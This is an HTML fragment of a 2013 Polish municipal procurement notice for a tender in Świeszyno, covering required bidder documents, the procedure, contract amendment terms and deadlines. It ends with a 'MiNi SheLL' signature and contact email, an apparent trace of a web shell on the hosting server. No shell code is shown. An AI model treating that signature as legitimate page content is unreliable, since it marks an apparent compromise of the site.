<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.    część zamówienia, które Wykonawca zamierza zlecić podwykonawcy - formularz nr 8
B.	Pełnomocnictwo do występowania w imieniu Wykonawcy i zaciągania w jego imieniu  zobowiązań. Musi być załączone w oryginale lub jako kopia poświadczona notarialnie.
C.	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji ich potencjału technicznego, kadrowego  lub finansowego na okres  korzystania z nich przy wykonywaniu  zamówienia (jeśli dotyczy).
D.	Dowód wpłacenia wadium.
E.	Kosztorys ofertowy szczegółow</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: 
Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian
Zamawiający zgodnie z art.144 ust.1 ustawy Prawo zamówień publicznych przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach: 
a) zmianą stawki podatku od towarów i usług (VAT) lub narzuceniem innych obciążeń publiczno - prawnych związanych z asortymentem będącym przedmiotem umowy; 
b) konieczności zmiany terminu realizacji w związku z: 
- koniecznością wprowadzenia zmian wynikających z konieczności dostosowania  
  zakresu zadania do wytycznych programowych lub powszechnie obowiązujących  
  przepisów prawa, 
- z brakiem możliwości prowadzenia robót na skutek obiektywnych warunków 
  klimatycznych, 
- działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego, 
- nieterminowym, z przyczyn niezależnych od Wykonawcy, przekazania przez  
  Zamawiającego terenu budowy Wykonawcy, 
- wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych 
  przez Wykonawcę, 
- opóźnieniem związanym z uzyskiwaniem przez Wykonawcę niezbędnych w myśl  
  ustawy Prawo budowlane dokumentów, 
- inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna ,  
  ekonomiczna lub techniczna, za którą żadne ze stron nie ponosi odpowiedzialności,
  skutkująca brakiem możliwości należytego wykonania umowy zgodnie z SIWZ 
- wystąpienie okoliczności powodujących konieczność opracowania oraz uzyskania 
  dodatkowych materiałów niezbędnych do prawidłowego zakończenia zadania 
c) zmiana parametrów przedmiotu zamówienia, 
- ze względu na nowe okoliczności, które zaistniały podczas wykonywania umowy, a 
  zmiany te są niezbędne do poprawnego funkcjonowania przedmiotu zamówienia, 
- materiały lub urządzenia przyjęte przez Zamawiającego są niedostępne na rynku, 
  zostały wycofane z produkcji. 
Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo wykonawcy, protokół konieczności - protokół konieczności wymaga zatwierdzenia przez Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ug.swieszyno.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Świeszyno
76-024 Świeszyno 71.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2013 godzina 10:00, miejsce: Urząd Gminy Świeszyno
76-024 Świeszyno 71 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROW 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com